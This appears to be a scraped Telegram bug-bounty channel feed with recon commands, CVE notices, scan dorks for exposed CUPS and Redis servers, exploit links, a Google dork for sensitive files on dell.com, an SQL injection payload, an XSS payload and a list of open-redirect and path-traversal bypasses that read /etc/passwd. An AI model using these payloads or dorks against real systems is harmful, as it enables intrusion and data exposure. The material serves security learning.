2246
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Subdomain Enumaration Using Web Archive
This is a Bash function for extracting subdomains from Web Archive results. You can add this function to your ~/.bashrc file.
function wayback() {
curl -sk "http://web.archive.org/cdx/search/cdx?url=*.$1&output=txt&fl=original&collapse=urlkey&page=" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u
}
Читать полностью…
https://eslam3kl.medium.com/simple-recon-methodology-920f5c5936d4
Читать полностью…
Stored XSS Critical or NOT?: mrro0o0tt/stored-xss-critical-or-not-da9eb9b19029?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@mrro0o0tt/stored-xss-critical-or-not-da9eb9b19029?source=rss------bug_bounty-5
Читать полностью…
REAL-WORLD BUG HUNTING
A Field Guide to Web Hacking
by Peter Yaworski
Bug Bounty for Beginners 💰
🔖#infosec #cybersecurity #hacking #pentesting #security
*CVE-2024-45409 | Ruby-SAML Auth Bypass In GitLab*
_*What You’ll Learn💡*_
1️⃣ *Overview | Discription of CVE-2024-45409*
2️⃣ *Reconnaissance For CVE-2024-45409*
*Shodan.io*
*Censys.io*
*Fofa.info*
*Hunter.how*
*ZoomEYE.HK*
_<======================>_
3️⃣ *E͢x͢p͢l͢o͢i͢t͢ ☣️ CVE-2024-45409 | GiveWP WordPress Plugin Exploit*
4️⃣ *E͢x͢p͢l͢o͢i͢t͢ Installation📥*
5️⃣ *E͢x͢p͢l͢o͢i͢t͢ Tool Guide🧭*
6️⃣ *Impact_💥*
7️⃣ *Severity_⚠️*
8️⃣ *Remediation_♻️*
_https://yashsec.com/bug-bounty/cve-2024-45409-auth-bypass-in-gitlab/
CVE-2024-31449 and other: Multiple vulnerabilities in Redis, 4.5 - 8.8 rating❗️
Three fresh vulnerabilities allow an attacker to perform RCE due to errors in the Lua scripting engine or DoS via malformed Access Control List selectors.
Search at Netlas.io:
👉 Link: https://nt.ls/1G7ul
👉 Dork: protocol:redis
Vendor's advisory: https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5
Exploiting Visual Studio via dump files - CVE-2024-30052
https://ynwarcs.github.io/exploiting-vs-dump-files
If you're into generating subdomains quickly 🚀
check out this website: husseinphp.github.io/subdomain/
CVE-2024-47076/CVE-2024-47175/CVE-2024-47176/CVE-2024-47177: Multiple CUPS flaws enable Linux remote code execution
A remote unauthenticated attacker can silently replace existing printers’ (or install new ones) IPP urls with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer).
PoC: https://github.com/RickdeJager/cupshax
This PoC uses dns-sd printer discovery, so the target must be able to receive the broadcast message, i.e. be on the same network.
CUPS Report and POC leaked online: https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1
Refer: https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8
Search Query:
HUNTER: header.server="CUPS"
SHODAN: product:"CUPS(IPP)" server: cups
FOFA: server="CUPS"
ZoomEye: app:"CUPS" +title:"CUPS"
Finally working on this and I will be back becoming more and more better guys so that I can help you guys understand things on how it really works...
Читать полностью…
For finding hidden parameter:
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"Читать полностью…
Rufus - Create bootable USB drives the easy way
https://rufus.ie/en/
⚡TOP 100 Vulnerabilities Step-by-Step Guide Handbook
https://github.com/Zorono/Learning-PDFs/blob/main/TOP%20100%20Vulnerabilities%20Step-by-Step%20Guide%20Handbook.pdf
try this google dork to find senstive files on website:
site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)Читать полностью…
amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5" rel="nofollow">https://medium.com/@amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5
Читать полностью…
#justforinfo
if you are a men then your wardrobe should at
least have:1 pair of navy blue chinos, 1 pair of beige chinos, 1 pair ofjeans, 1 pair of black trousers, 3 pairs of slacks/suit pants;black, navy blue, grey, 1 pair of beige linen trousers, 3 whitet-shirts, 3 black t-shirts, 3 navy blue t-shirts, 1 white shirt, 1white linen shirt with short sleeves, 1 black shirt, 1 navy blueshirt, 3 polos in neutral colors, 1 suit jacket (matching one ofyour slacks - one complete suit), 1 neutral jacket, 2 belts(brown and black), 1 pair of white sneakers, 2 pair of Oxfords(blown and black - to match your belts), 2 sweatshirts inneutral colors, 1 hoodie.
Here are few Good GraphQl report to learn more about it.
1. hackerone.com/reports/2048725
2. hackerone.com/reports/2524939
3. hackerone.com/reports/2357012
4. hackerone.com/reports/2122671
5. hackerone.com/reports/2207248
6. hackerone.com/reports/1864188
7. hackerone.com/reports/1085332
8. hackerone.com/reports/1084904
9. hackerone.com/reports/1293377
10. hackerone.com/reports/1192460
https://x.com/0x0SojalSec/status/1844104351662612734?t=xNLitsY0oO8iXlg62OPlvg&s=35
Читать полностью…
𝐗𝐒𝐒 𝐢𝐧 𝐏𝐡𝐨𝐧𝐞 𝐍𝐮𝐦𝐛𝐞𝐫 𝐅𝐢𝐞𝐥𝐝 ? 👇
Recently I re-watched the NahamCon2022EU: RTFR (Read The Bleeping RFC) by securinti
One thing I was surprised to find out was that phone number fields can be vulnerable to XSS.
How is that possible?
According to the RFC it is possible to append "optional parameter" to the number. Something like:
• 10203040;𝐞𝐱𝐭=+22
• 10203040;𝐢𝐬𝐮𝐛=12345
• 10203040;𝐩𝐡𝐨𝐧𝐞-𝐜𝐨𝐧𝐭𝐞𝐱𝐭=𝐞𝐱𝐚𝐦𝐩𝐥𝐞
This can lead to XSS if:
1. The library parses phone numbers according to RFC and accepts optional parameters such as "phone-context"
2. The phone number is reflected on the web interface without input validation or output encoding
So payloads like "10203040;𝐩𝐡𝐨𝐧𝐞-𝐜𝐨𝐧𝐭𝐞𝐱𝐭=<𝐬𝐜𝐫𝐢𝐩𝐭>𝐚𝐥𝐞𝐫𝐭(1)</𝐬𝐜𝐫𝐢𝐩𝐭>" CAN be a valid phone number and trigger XSS
Worlds fastest unlimited single and bulk subdomain finder! Use desktop!
https://cyfare.net/apps/subfind/
Write-Up — Telegram Anonymous Chat Hack Bot: EroHack/write-up-telegram-anonymous-chat-hack-bot-ad3497f813ed?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@EroHack/write-up-telegram-anonymous-chat-hack-bot-ad3497f813ed?source=rss------bug_bounty-5
Читать полностью…
SQLI Injection
CVE: 2024-36837
Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334
#BugBounty #Tips
Fuzzing from First Principles
https://zerodayengineering.com/research/slides/FuzzingFromFirstPrinciples.pdf
you can try this effective manual openredirect Bypass:
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. IP address variants:
- http://3232235777 (decimal notation of an IP)
- http://0xC0A80001 (hex notation of IP)
- http://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- http://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:password@google.com/
- http://@google.com
22. Combination of userinfo and traversal:
- https://admin:password@google.com/../../etc/passwd
How to Create a Fun, Engaging, and Long-Lasting Bug Bounty Program for Your Community: GrowthKingdom/how-to-create-a-fun-engaging-and-long-lasting-bug-bounty-program-for-your-community-f67da7fb230a?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@GrowthKingdom/how-to-create-a-fun-engaging-and-long-lasting-bug-bounty-program-for-your-community-f67da7fb230a?source=rss------bug_bounty-5
Читать полностью…
The Hacker Mentality
https://www.youtube.com/watch?v=X2uK5fd0VxA
GitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)
https://github.com/securelayer7/CVE-2024-38856_Scanner
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss
Читать полностью…